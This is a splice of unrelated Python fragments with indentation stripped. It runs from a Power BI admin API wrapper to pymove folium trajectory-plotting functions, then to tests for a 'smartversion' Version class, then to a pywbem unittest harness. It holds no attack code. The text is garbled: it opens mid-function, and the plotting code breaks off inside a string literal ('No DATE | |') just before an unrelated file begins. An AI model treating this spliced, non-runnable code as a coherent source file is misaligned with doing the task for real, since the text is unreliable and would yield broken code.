except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def delete_user_from_group(self, workspace_id, user):
"""Removes user permissions from the specified workspace.
This API call only supports updating workspaces in the new workspace experience and removing a user principal.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
user: str
The user principal name (UPN) of the user to remove (usually the user's email).
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/groups/{}/users/{}".format(workspace_id, user)
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.delete(url, headers=headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_group_preview(self, workspace_id, capacityId=None, dashboards=None, dataflowStorageId=None, dataflows=None, datasets=None, description=None, isOnDedicatedCapacity=None, isReadOnly=None, name=None, pipelineId=None, reports=None, state=None, typee=None, users=None, workbooks=None):
"""Updates the properties of the specified workspace.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
This API call only updates workspaces in the new workspace experience. Only the name and description can be updated. The name must be unique inside an organization.
### Parameters
----
workspace_id:
The Power Bi workspace id. You can take it from PBI Service URL
### Request Body
----
id: string
The workspace ID
capacityId: string
The capacity ID
dashboards: str[]
List of the dashboards ids that belong to the group. Available only for admin API calls.
dataflowStorageId: string
The Power BI dataflow storage account ID
dataflows: str[]
List of the dataflows ids that belong to the group. Available only for admin API calls.
datasets: str[]
List of the datasets ids that belong to the group. Available only for admin API calls.
description: string
The group description. Available only for admin API calls.
isOnDedicatedCapacity: bool
Is the group on dedicated capacity
isReadOnly: bool
Is the group read only
name: string
The group name
pipelineId: string
The deployment pipeline ID that the workspace is assigned to. Available only for workspaces in the new workspace experience and only for admin API calls.
reports: str[]
List of the reports ids that belong to the group. Available only for admin API calls.
state: string
The group state. Available only for admin API calls.
typee: string
The type of group. Available only for admin API calls.
users: GroupUser[]
List of the users that belong to the group. Available only for admin API calls.
mv = mv_df.reset_index().loc[:n_rows, [LATITUDE, LONGITUDE]]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
def plot_trajectory_by_period(
move_data,
period,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_period_with_folium.html",
):
"""
Generate trajectory view by period of day provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
period: String
Represents period of day.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents the number of data rows to plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents whether to save this visualization to a new .html file.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if plotting for many users; otherwise colors will be chosen at random.
filename : String, optional, default 'plot_trajectory_by_period_with_folium.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError period not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if PERIOD not in move_data:
move_data.generate_time_of_day_features()
mv_df = move_data[move_data[PERIOD] == period].reset_index()
if not len(mv_df):
raise KeyError(f"No PERIOD found in dataframe")
if n_rows is None:
n_rows = mv_df.shape[0]
if id_ is not None:
mv_df = mv_df[mv_df[TRAJ_ID] == id_].loc[
:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]
]
if not len(mv_df):
raise IndexError(f"No user with id {id_} in dataframe")
else:
mv_df = mv_df.loc[:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]]
if id_ is not None:
items = list(zip([id_], [color]))
else:
ids = mv_df[TRAJ_ID].unique()
if isinstance(color, str):
colors = [generate_color() for _ in ids]
else:
colors = color[:]
items = list(zip(ids, colors))
for _id, color in items:
mv = mv_df[mv_df[TRAJ_ID] == _id]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if id_ is None and legend:
add_map_legend(base_map, "Color by user ID", items)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
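# Usage sketch (assumes `move_df` is a pymove MoveDataFrame; 'Morning' is one of
# the labels produced by generate_time_of_day_features()):
#   m = plot_trajectory_by_period(move_df, period='Morning', id_=1)
#   # or save directly to disk:
#   plot_trajectory_by_period(move_df, period='Morning', save_as_html=True)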
def plot_trajectory_by_day_week(
move_data,
day_week,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_day_week.html",
):
"""
Generate trajectory view by day week provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
day_week: String
Represents day week.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents the number of data rows to plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents whether to save this visualization to a new .html file.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if plotting for many users; otherwise colors will be chosen at random.
filename : String, optional, default 'plot_trajectory_by_day_week.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError day_week not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if DAY not in move_data:
move_data.generate_day_of_the_week_features()
mv_df = move_data[move_data[DAY] == day_week].reset_index()
if not len(mv_df):
raise KeyError(f"No DAY found in dataframe")
if n_rows is None:
n_rows = mv_df.shape[0]
if id_ is not None:
mv_df = mv_df[mv_df[TRAJ_ID] == id_].loc[
:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]
]
if not len(mv_df):
raise IndexError(f"No user with id {id_} in dataframe")
else:
mv_df = mv_df.loc[:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]]
if id_ is not None:
items = list(zip([id_], [color]))
else:
ids = mv_df[TRAJ_ID].unique()
if isinstance(color, str):
colors = [generate_color() for _ in ids]
else:
colors = color[:]
items = list(zip(ids, colors))
for _id, color in items:
mv = mv_df[mv_df[TRAJ_ID] == _id]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if id_ is None and legend:
add_map_legend(base_map, "Color by user ID", items)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
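# Usage sketch (assumes `move_df` is a pymove MoveDataFrame; 'Monday' is one of
# the labels produced by generate_day_of_the_week_features()):
#   m = plot_trajectory_by_day_week(move_df, day_week='Monday', legend=True)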
def plot_trajectory_by_date(
move_data,
start_date,
end_date,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_date.html",
):
"""
Generate trajectory view by period of time provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
start_date : String
Represents start date of time period.
end_date : String
Represents end date of time period.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents the number of data rows to plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents whether to save this visualization to a new .html file.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if plotting for many users; otherwise colors will be chosen at random.
filename : String, optional, default 'plot_trajectory_by_date.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError start or end date range not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if isinstance(start_date, str):
start_date = str_to_datetime(start_date).date()
if isinstance(end_date, str):
end_date = str_to_datetime(end_date).date()
if DATE not in move_data:
move_data.generate_date_features()
mv_df = move_data[
(move_data[DATE] <= end_date) & (move_data[DATE] >= start_date)
].reset_index()
if not len(mv_df):
raise KeyError(f"No DATE | |
# smartversion/foo.py
# Imports for the tests below; the original file header was stripped, so the
# exact import path for Version is an assumption.
import random
from datetime import date
from smartversion import Version
def test_usage():
l = []
for i in range(20):
l.append(Version(i, i))
for i in range(20):
assert(l[i] == Version(i, i))
v1 = Version(0)
v2 = Version(0)
assert(v1 == v2)
assert(hash(v1) == hash(v2))
v1 = Version(1, 2, '3-rc6')
v2 = Version(1, 2, 4)
assert(v1 != v2)
assert(hash(v1) != hash(v2))
v2 = Version(1, 2, '3-rc6')
assert(v1 == v2)
assert(hash(v1) == hash(v2))
d = {}
for i in range(20):
v = Version(i, i, i)
d[v] = i
for i in range(20):
v = Version(i, i, i)
assert(d[v] == i)
v1 = Version(0, 1, 2)
v2 = Version(0, 1, 3)
s = set([v1, v2])
assert(len(s) == 2)
v2 = Version(0, 1, 2)
s = set([v1, v2])
assert(len(s) == 1)
def test_compare():
compare = lambda l: l[0] == l[1]
# TODO check both semver and pep404 comparisons (and interactions)
# TODO check semantics where default is wrong
# Equalities
v1 = Version(major=0)
v2 = Version() # Implied 0
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1)
v2 = Version('foo', 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1)
v2 = Version('foo', 1, 0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 1, 0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1')
v2 = Version('foo', 1, 1, '1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1rc')
v2 = Version('foo', 1, 1, '1rc')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 1, '1rc1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 'rc1')
v2 = Version('foo', 1, 1, 'rc1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 'rc')
v2 = Version('foo', 1, 1, 'rc')
assert(v1 == v2)
assert(v2 == v1)
# extra_str shouldn't affect comparison
v1 = Version('foo', 1, extra_str = 'asd')
v2 = Version('foo', 1, extra_str = 'lkj')
assert(v1 == v2)
assert(v2 == v1)
# nor release_date
v1 = Version('foo', 1, release_date = date(2000, 1, 1))
v2 = Version('foo', 1, release_date = date(2000, 1, 2))
assert(v1 == v2)
assert(v2 == v1)
# nor build_meta
v1 = Version('foo', 1, build_meta = 'lkasdjf')
v2 = Version('foo', 1, build_meta = ';KFJDAa')
assert(v1 == v2)
assert(v2 == v1)
# Inequalities
v1 = Version(major=0)
v2 = Version(major=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version(major=0, minor=0)
v2 = Version(major=0, minor=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version(major=0, minor=0, patch=0)
v2 = Version(major=0, minor=0, patch=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', have_clue=True)
v2 = Version('bar', have_clue=True)
#assert(v1 != v2)
#assert(v2 != v1)
v1 = Version('foo', 1)
v2 = Version('foo', 2)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 2)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 2)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, '1test')
v2 = Version('foo', 1, 1, '1frob')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, '1test5')
v2 = Version('foo', 1, 1, '1test6')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, 'test5')
v2 = Version('foo', 1, 1, 'test6')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, 'test')
v2 = Version('foo', 1, 1, 'frob')
assert(v1 != v2)
assert(v2 != v1)
# Ordering
v1 = Version(major=0)
v2 = Version(major=1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1)
v2 = Version('foo', 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, None)
v2 = Version('foo', 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2)
v2 = Version('foo', 2, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 2)
v2 = Version('foo', 1, 2, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2, 1)
v2 = Version('foo', 2, 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc0')
v2 = Version('foo', 1, 1, 'rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1-rc1')
v2 = Version('foo', 1, 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc0')
v2 = Version('foo', 1, 1, '1rc0')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc0')
v2 = Version('foo', 1, 1, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 1, '2rc0')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 2, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2, '1rc1')
v2 = Version('foo', 2, 1, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc1')
v2 = Version('foo', 1, 1)
assert(v1 < v2)
assert(v2 > v1)
def test_compare_typical():
# Normal usage
v1 = Version.parse('linux-2.4.6')
v2 = Version.parse('linux-2.4.8')
v3 = Version.parse('linux-2.4.10-rc1') # rc < version proper
v4 = Version.parse('linux-2.4.10')
v5 = Version.parse('linux-2.6.27.10')
v6 = Version.parse('linux-2.6.27.11')
v7 = Version.parse('linux-3.0')
v8 = Version.parse('linux-3.0.1')
v9 = Version.parse('linux-3.0.65')
v10 = Version.parse('linux-3.0.65.1')
v11 = Version.parse('linux-4.x')
v12 = Version.parse('linux-5.X')
assert(v1 < v2)
assert(v2 > v1)
assert(v1 != v2)
assert(v2 != v1)
# Make sure rc compare ABOVE lower version without patch_str
assert(v2 < v3)
assert(v3 > v2)
assert(v2 != v3)
assert(v3 != v2)
assert(v3 < v4)
assert(v4 > v3)
assert(v3 != v4)
assert(v4 != v3)
assert(v4 < v5)
assert(v5 > v4)
assert(v4 != v5)
assert(v5 != v4)
assert(v5 < v6)
assert(v6 > v5)
assert(v5 != v6)
assert(v6 != v5)
assert(v6 < v7)
assert(v7 > v6)
assert(v6 != v7)
assert(v7 != v6)
assert(v7 < v8)
assert(v8 > v7)
assert(v7 != v8)
assert(v8 != v7)
assert(v8 < v9)
assert(v9 > v8)
assert(v8 != v9)
assert(v9 != v8)
assert(v9 < v10)
assert(v10 > v9)
assert(v9 != v10)
assert(v10 != v9)
assert(v10 < v11)
assert(v11 > v10)
assert(v10 != v11)
assert(v11 != v10)
assert(v11 < v12)
assert(v12 > v11)
assert(v11 != v12)
assert(v12 != v11)
l = sorted([v12, v11, v10, v9, v8, v7, v6, v5, v4, v3, v2, v1])
for i in range(10):
assert(l[0] == v1)
assert(l[1] == v2)
assert(l[2] == v3)
assert(l[3] == v4)
assert(l[4] == v5)
assert(l[5] == v6)
assert(l[6] == v7)
assert(l[7] == v8)
assert(l[8] == v9)
assert(l[9] == v10)
assert(l[10] == v11)
assert(l[11] == v12)
random.shuffle(l)
l.sort()
# TODO compare for
# 1.71 (decimal) < 1.8
def test_wildcards():
for char in ['x', 'X', '*']:
# Equality
v1 = Version(major=char)
v2 = Version(major=1)
assert(v1 == v2)
assert(v2 == v1)
# wildcard implies wildcard for any lesser fields
v1 = Version(major=char)
v2 = Version(major=1, minor=1)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=1, minor=1, patch='1.1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=char, minor=char)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=char)
v2 = Version(major=0, minor=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char)
v2 = Version(major=0, minor=0, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=char, patch=0)
v2 = Version(major=0, minor=9, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=0, minor=1, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=0, minor=char, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char)
v2 = Version(major=0, minor=0, patch='1.5')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch='1.'+char)
v2 = Version(major=0, minor=0, patch='1.5')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char+'.5')
v2 = Version(major=0, minor=0, patch='1.5')
#!/usr/bin/env python
#import gmetaddata as gmetad
#import gmonddata as gmond
import optparse
import pywbem
from lib import wbem_connection
#import telnetlib as telnet
#import elementtree.ElementTree as ET
#import socket
import unittest
import os
import shutil
import random
import sys
real_tolerance = 0.01
conn = None
#This test requires the usage of elementtree
_g_opts = None
_g_args = None
def _typed_randrange(lo, hi, type):
if type == 'sint8':
return pywbem.Sint8(random.randrange(pywbem.Sint8(lo), pywbem.Sint8(hi)))
elif type == 'sint16':
return pywbem.Sint16(random.randrange(pywbem.Sint16(lo), pywbem.Sint16(hi)))
elif type == 'sint32':
return pywbem.Sint32(random.randrange(pywbem.Sint32(lo), pywbem.Sint32(hi)))
elif type == 'sint64':
return pywbem.Sint64(random.randrange(pywbem.Sint64(lo), pywbem.Sint64(hi)))
elif type == 'uint8':
return pywbem.Uint8(random.randrange(pywbem.Uint8(lo), pywbem.Uint8(hi)))
elif type == 'uint16':
return pywbem.Uint16(random.randrange(pywbem.Uint16(lo), pywbem.Uint16(hi)))
elif type == 'uint32':
return pywbem.Uint32(random.randrange(pywbem.Uint32(lo), pywbem.Uint32(hi)))
elif type == 'uint64':
return pywbem.Uint64(random.randrange(pywbem.Uint64(lo), pywbem.Uint64(hi)))
elif type == 'real32':
return pywbem.Real32(random.randrange(pywbem.Real32(lo), pywbem.Real32(hi)))
elif type == 'real64':
return pywbem.Real64(random.randrange(pywbem.Real64(lo), pywbem.Real64(hi)))
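# e.g. _typed_randrange(0, 10, 'uint8') returns a pywbem.Uint8 drawn from [0, 10);
# type strings not listed above fall through and the function returns None.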
################################################################################
class TestMethods(unittest.TestCase):
limits = {'sint8_min':pywbem.Sint8(-128),
'sint8_max':pywbem.Sint8(127),
'sint16_min':pywbem.Sint16(-32768),
'sint16_max':pywbem.Sint16(32767),
'sint32_min':pywbem.Sint32(-2147483648),
'sint32_max':pywbem.Sint32(2147483647),
'sint64_min':pywbem.Sint64(-9223372036854775808L),
'sint64_max':pywbem.Sint64(9223372036854775807L),
'uint8_min':pywbem.Uint8(0),
'uint8_max':pywbem.Uint8(0xFF),
'uint16_min':pywbem.Uint16(0),
'uint16_max':pywbem.Uint16(0xFFFF),
'uint32_min':pywbem.Uint32(0),
'uint32_max':pywbem.Uint32(0xFFFFFFFF),
'uint64_min':pywbem.Uint64(0L),
'uint64_max':pywbem.Uint64(0x7FFFFFFFFFFFFFFFL),
'real32_min':pywbem.Real32(-123456.78),
'real32_max':pywbem.Real32(123456.78),
'real64_min':pywbem.Real64(-12345678987654.32),
'real64_max':pywbem.Real64(12345678987654.32)}
# note: the last Uint64 value should be 0xFFFFFFFFFFFFFFFF but there is a bug somewhere...
inttypes = ['sint8', 'sint16', 'sint32', 'sint64', 'uint8', 'uint16', 'uint32', 'uint64']
realtypes = ['real32', 'real64']
zeros = {'sint8':pywbem.Sint8(0),
'sint16':pywbem.Sint16(0),
'sint32':pywbem.Sint32(0),
'sint64':pywbem.Sint64(0),
'uint8':pywbem.Uint8(0),
'uint16':pywbem.Uint16(0),
'uint32':pywbem.Uint32(0),
'uint64':pywbem.Uint64(0),
'real32':pywbem.Real32(0),
'real64':pywbem.Real64(0)}
ones = {'sint8':pywbem.Sint8(1),
'sint16':pywbem.Sint16(1),
'sint32':pywbem.Sint32(1),
'sint64':pywbem.Sint64(1),
'uint8':pywbem.Uint8(1),
'uint16':pywbem.Uint16(1),
'uint32':pywbem.Uint32(1),
'uint64':pywbem.Uint64(1),
'real32':pywbem.Real32(0),
'real64':pywbem.Real64(0)}
tens = {'sint8':pywbem.Sint8(10),
'sint16':pywbem.Sint16(10),
'sint32':pywbem.Sint32(10),
'sint64':pywbem.Sint64(10),
'uint8':pywbem.Uint8(10),
'uint16':pywbem.Uint16(10),
'uint32':pywbem.Uint32(10),
'uint64':pywbem.Uint64(10),
'real32':pywbem.Real32(10),
'real64':pywbem.Real64(10)}
twenties = {'sint8':pywbem.Sint8(20),
'sint16':pywbem.Sint16(20),
'sint32':pywbem.Sint32(20),
'sint64':pywbem.Sint64(20),
'uint8':pywbem.Uint8(20),
'uint16':pywbem.Uint16(20),
'uint32':pywbem.Uint32(20),
'uint64':pywbem.Uint64(20),
'real32':pywbem.Real32(20),
'real64':pywbem.Real64(20)}
numlists = {
'sint8':[pywbem.Sint8(8), pywbem.Sint8(2), pywbem.Sint8(5),
pywbem.Sint8(6), pywbem.Sint8(3), pywbem.Sint8(9),
pywbem.Sint8(7), pywbem.Sint8(1), pywbem.Sint8(4)],
'sint16':[pywbem.Sint16(8), pywbem.Sint16(2), pywbem.Sint16(5),
pywbem.Sint16(6), pywbem.Sint16(3), pywbem.Sint16(9),
pywbem.Sint16(7), pywbem.Sint16(1), pywbem.Sint16(4)],
'sint32':[pywbem.Sint32(8), pywbem.Sint32(2), pywbem.Sint32(5),
pywbem.Sint32(6), pywbem.Sint32(3), pywbem.Sint32(9),
pywbem.Sint32(7), pywbem.Sint32(1), pywbem.Sint32(4)],
'sint64':[pywbem.Sint64(8), pywbem.Sint64(2), pywbem.Sint64(5),
pywbem.Sint64(6), pywbem.Sint64(3), pywbem.Sint64(9),
pywbem.Sint64(7), pywbem.Sint64(1), pywbem.Sint64(4)],
'uint8':[pywbem.Uint8(8), pywbem.Uint8(2), pywbem.Uint8(5),
pywbem.Uint8(6), pywbem.Uint8(3), pywbem.Uint8(9),
pywbem.Uint8(7), pywbem.Uint8(1), pywbem.Uint8(4)],
'uint16':[pywbem.Uint16(8), pywbem.Uint16(2), pywbem.Uint16(5),
pywbem.Uint16(6), pywbem.Uint16(3), pywbem.Uint16(9),
pywbem.Uint16(7), pywbem.Uint16(1), pywbem.Uint16(4)],
'uint32':[pywbem.Uint32(8), pywbem.Uint32(2), pywbem.Uint32(5),
pywbem.Uint32(6), pywbem.Uint32(3), pywbem.Uint32(9),
pywbem.Uint32(7), pywbem.Uint32(1), pywbem.Uint32(4)],
'uint64':[pywbem.Uint64(8), pywbem.Uint64(2), pywbem.Uint64(5),
pywbem.Uint64(6), pywbem.Uint64(3), pywbem.Uint64(9),
pywbem.Uint64(7), pywbem.Uint64(1), pywbem.Uint64(4)],
'real32':[pywbem.Real32(8), pywbem.Real32(2), pywbem.Real32(5),
pywbem.Real32(6), pywbem.Real32(3), pywbem.Real32(9),
pywbem.Real32(7), pywbem.Real32(1), pywbem.Real32(4)],
'real64':[pywbem.Real64(8), pywbem.Real64(2), pywbem.Real64(5),
pywbem.Real64(6), pywbem.Real64(3), pywbem.Real64(9),
pywbem.Real64(7), pywbem.Real64(1), pywbem.Real64(4)]}
def _dbgPrint(self, msg=''):
if self._verbose:
if len(msg):
print('\t -- %s --' % msg)
else:
print('')
def setUp(self):
unittest.TestCase.setUp(self)
self.conn = conn
self.conn.debug = True
for iname in self.conn.EnumerateInstanceNames('Test_Method'):
self.conn.DeleteInstance(iname)
self._verbose = _g_opts.verbose
self._dbgPrint()
def tearDown(self):
unittest.TestCase.tearDown(self)
for iname in self.conn.EnumerateInstanceNames('Test_Method'):
self.conn.DeleteInstance(iname)
def _run_and_validate_getrand(self,
type,
methodName,
min,
max,
expectedReturnValue=None,
minReturnValue=None,
maxReturnValue=None):
isRealType = False
if type.startswith('real'):
isRealType = True
if isRealType:
self._dbgPrint('Testing %s invocation with min=%f, max=%f' % (methodName, min, max))
else:
self._dbgPrint('Testing %s invocation with min=%d, max=%d' % (methodName, min, max))
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', min=min, max=max)
if not oparams['success']:
self.fail('"Success" reported as false for invocation of method %s' % methodName)
if expectedReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) equal to expected return value %f...' % (rv, expectedReturnValue))
if abs(expectedReturnValue - rv) > real_tolerance:
self.fail('Return value not as expected for invocation of method %s' % methodName)
else:
self._dbgPrint('Verifying return value (%d) equal to expected return value %d...' % (rv, expectedReturnValue))
if expectedReturnValue != rv:
self.fail('Return value not as expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
if minReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) >= %f' % (rv, minReturnValue))
else:
self._dbgPrint('Verifying return value (%d) >= %d' % (rv, minReturnValue))
if rv < minReturnValue:
self.fail('Return value less than expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
if maxReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) <= %f' % (rv, maxReturnValue))
else:
self._dbgPrint('Verifying return value (%d) <= %d' % (rv, maxReturnValue))
if rv > maxReturnValue:
self.fail('Return value greater than expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
def _run_and_validate_getrandlist(self,
type,
methodName,
min,
max,
nelems):
